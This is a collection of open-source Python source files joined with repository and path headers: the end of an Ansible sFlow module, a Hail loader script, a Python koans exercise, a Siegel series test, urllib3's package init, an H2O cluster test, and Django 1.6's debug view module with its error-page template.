agent_ip=dict(required=False, type='str'),
source_ip=dict(required=False, type='str'),
export_route=dict(required=False, type='str',
choices=['enable', 'disable']),
rate_limit=dict(required=False, type='str'),
rate_limit_slot=dict(required=False, type='str'),
forward_enp_slot=dict(required=False, type='str'),
collector_id=dict(required=False, type='str', choices=['1', '2']),
collector_ip=dict(required=False, type='str'),
collector_ip_vpn=dict(required=False, type='str'),
collector_datagram_size=dict(required=False, type='str'),
collector_udp_port=dict(required=False, type='str'),
collector_meth=dict(required=False, type='str',
choices=['meth', 'enhanced']),
collector_description=dict(required=False, type='str'),
sflow_interface=dict(required=False, type='str'),
sample_collector=dict(required=False, type='list'),
sample_rate=dict(required=False, type='str'),
sample_length=dict(required=False, type='str'),
sample_direction=dict(required=False, type='str',
choices=['inbound', 'outbound', 'both']),
counter_collector=dict(required=False, type='list'),
counter_interval=dict(required=False, type='str'),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = Sflow(argument_spec)
module.work()
if __name__ == '__main__':
main()
|
hail-is/hail
|
refs/heads/master
|
datasets/load/load.1000_Genomes_phase3_sites.GRCh37.py
|
3
|
import hail as hl
ht = hl.import_table(
'gs://hail-datasets-raw-data/1000_Genomes/1000_Genomes_phase3_sites_GRCh37.tsv.bgz',
reference_genome='GRCh37')
ht.describe()
|
realsagi/python_koans
|
refs/heads/master
|
python3/koans/about_lists.py
|
48
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(__, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, __], nums)
nums.append(333)
self.assertListEqual([1, 2, __], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[0])
self.assertEqual(__, noms[3])
self.assertEqual(__, noms[-1])
self.assertEqual(__, noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[0:1])
self.assertEqual(__, noms[0:2])
self.assertEqual(__, noms[2:2])
self.assertEqual(__, noms[2:20])
self.assertEqual(__, noms[4:0])
self.assertEqual(__, noms[4:100])
self.assertEqual(__, noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[2:])
self.assertEqual(__, noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
self.assertEqual(__, list(range(5)))
self.assertEqual(__, list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual(__, list(range(0, 8, 2)))
self.assertEqual(__, list(range(1, 8, 3)))
self.assertEqual(__, list(range(5, -7, -4)))
self.assertEqual(__, list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(__, knight)
knight.insert(0, 'Arthur')
self.assertEqual(__, knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual(__, stack)
popped_value = stack.pop()
self.assertEqual(__, popped_value)
self.assertEqual(__, stack)
popped_value = stack.pop(1)
self.assertEqual(__, popped_value)
self.assertEqual(__, stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual(__, queue)
popped_value = queue.pop(0)
self.assertEqual(__, popped_value)
self.assertEqual(__, queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
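# A minimal illustration of that point (editor's note, not one of the koan exercises):
#     from collections import deque
#     queue = deque([1, 2])
#     queue.append('last')       # enqueue on the right
#     first = queue.popleft()    # O(1) dequeue from the left
#     # first == 1 and list(queue) == [2, 'last']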
|
stakemori/siegel_series
|
refs/heads/master
|
tests/fourier_coeff_low_degree2.py
|
1
|
import unittest
from sage.all import eisenstein_series_qexp, matrix, ZZ
from ..siegel_eisenstein import SiegelEisensteinSeries as sess
from degree2.all import eisenstein_series_degree2
class FourierCoeffsLowDegrees(unittest.TestCase):
def assert_degree_1(self, k):
es = eisenstein_series_qexp(k, prec=11, normalization="constant")
es1 = sess(weight=k, degree=1)
self.assertTrue(all(es[a] == es1.fourier_coefficient(matrix([[a]]))
for a in range(11)))
def test_degree_1(self):
'''
Test Fourier coefficients of Siegel Eisenstein series of degree 1.
'''
for k in [4, 6, 8, 10]:
self.assert_degree_1(k)
def assert_degree_2(self, k):
es = eisenstein_series_degree2(k, prec=10)
es1 = sess(weight=k, degree=2)
self.assertTrue(
all(es[(n, r, m)] == es1.fourier_coefficient(matrix([[n, ZZ(r) / ZZ(2)],
[ZZ(r) / ZZ(2), m]]))
for n, r, m in es.prec))
def test_degree_2(self):
'''
Test Fourier coefficients of Siegel Eisenstein series of degree 2.
'''
for k in [4, 6, 8, 10]:
self.assert_degree_2(k)
suite = unittest.TestLoader().loadTestsFromTestCase(FourierCoeffsLowDegrees)
unittest.TextTestRunner(verbosity=2).run(suite)
|
JFriel/honours_project
|
refs/heads/master
|
venv/lib/python2.7/site-packages/requests/packages/urllib3/__init__.py
|
360
|
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
from __future__ import absolute_import
import warnings
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from . import exceptions
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util.request import make_headers
from .util.url import get_host
from .util.timeout import Timeout
from .util.retry import Retry
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
__author__ = 'Andrey Petrov (andrey.petrov@shazow.net)'
__license__ = 'MIT'
__version__ = '1.16'
__all__ = (
'HTTPConnectionPool',
'HTTPSConnectionPool',
'PoolManager',
'ProxyManager',
'HTTPResponse',
'Retry',
'Timeout',
'add_stderr_logger',
'connection_from_url',
'disable_warnings',
'encode_multipart_formdata',
'get_host',
'make_headers',
'proxy_from_url',
)
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
logger.debug('Added a stderr logging handler to logger: %s', __name__)
return handler
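# Illustrative usage (editor's note, a sketch rather than part of the vendored module;
# it assumes the package is importable under the top-level name "urllib3"):
#     import logging
#     import urllib3
#     handler = urllib3.add_stderr_logger(logging.INFO)  # returns the attached StreamHandler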
# ... Clean up.
del NullHandler
# All warning filters *must* be appended unless you're really certain that they
# shouldn't be: otherwise, it's very hard for users to use most Python
# mechanisms to silence them.
# SecurityWarning's always go off by default.
warnings.simplefilter('always', exceptions.SecurityWarning, append=True)
# SubjectAltNameWarning's should go off once per host
warnings.simplefilter('default', exceptions.SubjectAltNameWarning, append=True)
# InsecurePlatformWarning's don't vary between requests, so we keep it default.
warnings.simplefilter('default', exceptions.InsecurePlatformWarning,
append=True)
# SNIMissingWarnings should go off only once.
warnings.simplefilter('default', exceptions.SNIMissingWarning, append=True)
def disable_warnings(category=exceptions.HTTPWarning):
"""
Helper for quickly disabling all urllib3 warnings.
"""
warnings.simplefilter('ignore', category)
|
h2oai/h2o-2
|
refs/heads/master
|
py/testdir_multi_jvm/test_dead_node_status.py
|
9
|
import unittest, time, sys
sys.path.extend(['.','..','../..','py'])
import h2o_browse as h2b
import h2o, h2o_util, h2o_log
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init(3)
@classmethod
def tearDownClass(cls):
# time.sleep(3600)
h2o.tear_down_cloud()
def test_dead_node_status(self):
# view logs using each node
h2b.browseTheCloud()
for h in h2o.nodes:
h.log_view()
# terminate node 1
h2o.nodes[1].terminate_self_only()
# remember which is [1] so we can check cloud state correctly
badPort = "/" + str(h2o.nodes[1].http_addr) + ":" + str(h2o.nodes[1].port)
nodeList = h2o.nodes[:] # copy
del nodeList[1] # 1 is dead now
print "We probably need some status to interrogate to understand a node is in red state?"
print "And I probably need to wait 60 secs to get to red state"
time.sleep(120)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# time.sleep(5)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# time.sleep(5)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# just check that node_healthy' goes 'false' on that node
# and 'cloud_healthy' goes false
# everyone should see the same stuff (0 and 2, 1 won't respond)
for n in (0,2):
c = h2o.nodes[n].get_cloud()
# the node order doesn't match our node order
for i in range(3):
expected = c['nodes'][i]['name']!=badPort
self.assertEqual(c['nodes'][i]['node_healthy'], expected)
self.assertEqual(c['cloud_healthy'], False, msg="node %s shouldn't think the cloud is healthy: %s" % (n, c['cloud_healthy']))
if __name__ == '__main__':
h2o.unit_main()
|
dulems/hue
|
refs/heads/master
|
desktop/core/ext-py/Django-1.6.10/django/views/debug.py
|
98
|
from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.datastructures import MultiValueDict
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p+1
p = template_source.find('\n', p+1)
yield len(template_source) + 1
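# Illustrative example (editor's note): linebreak_iter("ab\ncd") yields 0, 3, 6,
# i.e. the offset at which each line starts plus one position past the end of
# the template source.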
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = dict((k, cleanse_setting(k, v)) for k,v in value.items())
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
return cleansed
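# Illustrative example (editor's note): with the HIDDEN_SETTINGS pattern above,
# cleanse_setting('SECRET_KEY', 'abc') returns CLEANSED_SUBSTITUTE, while
# cleanse_setting('DEBUG', True) returns True unchanged.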
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponseServerError(text, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponseServerError(html, content_type='text/html')
# Cache for the default exception reporter filter instance.
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
global default_exception_reporter_filter
if default_exception_reporter_filter is None:
# Load the default filter for the first time and cache it.
default_exception_reporter_filter = import_by_path(
settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
if request:
return getattr(request, 'exception_reporter_filter', default_exception_reporter_filter)
else:
return default_exception_reporter_filter
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
if isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
elif isinstance(value, MultiValueDict):
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = None
self.template_does_not_exist = False
self.loader_debug_info = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def format_path_status(self, path):
if not os.path.exists(path):
return "File does not exist"
if not os.path.isfile(path):
return "Not a file"
if not os.access(path, os.R_OK):
return "File is not readable"
return "File exists"
def get_traceback_data(self):
"Return a Context instance containing traceback information."
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
from django.template.loader import template_source_loaders
self.template_does_not_exist = True
self.loader_debug_info = []
# If the template_source_loaders haven't been populated yet, you need
# to provide an empty list for this for loop to not fail.
if template_source_loaders is None:
template_source_loaders = []
for loader in template_source_loaders:
try:
source_list_func = loader.get_template_sources
# NOTE: This assumes exc_value is the name of the template that
# the loader attempted to load.
template_list = [{
'name': t,
'status': self.format_path_status(t),
} for t in source_list_func(str(self.exc_value))]
except AttributeError:
template_list = []
loader_name = loader.__module__ + '.' + loader.__class__.__name__
self.loader_debug_info.append({
'loader': loader_name,
'templates': template_list,
})
if (settings.TEMPLATE_DEBUG and
hasattr(self.exc_value, 'django_template_source')):
self.get_template_exception_info()
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': datetime.datetime.now(),
'django_version_info': get_version(),
'sys_path' : sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'loader_debug_info': self.loader_debug_info,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data())
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data(), autoescape=False)
return t.render(c)
def get_template_exception_info(self):
origin, (start, end) = self.exc_value.django_template_source
template_source = origin.reload()
context_lines = 10
line = 0
upto = 0
source_lines = []
before = during = after = ""
for num, next in enumerate(linebreak_iter(template_source)):
if start >= upto and end <= next:
line = num
before = escape(template_source[upto:start])
during = escape(template_source[start:end])
after = escape(template_source[end:next])
source_lines.append( (num, escape(template_source[upto:next])) )
upto = next
total = len(source_lines)
top = max(1, line - context_lines)
bottom = min(total, line + 1 + context_lines)
# In some rare cases, exc_value.args might be empty.
try:
message = self.exc_value.args[0]
except IndexError:
message = '(Could not get exception message)'
self.template_info = {
'message': message,
'source_lines': source_lines[top:bottom],
'before': before,
'during': during,
'after': after,
'top': top,
'bottom': bottom,
'total': total,
'line': line,
'name': origin.name,
}
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno+1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
frames = []
tb = self.tb
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
if pre_context_lineno is not None:
frames.append({
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [ (f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames ]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': request.path_info[1:], # Trim leading slash
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
c = Context({})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>
{% for t in loader.templates %}<li><code>{{ t.name }}</code> ({{ t.status }})</li>{% endfor %}
</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
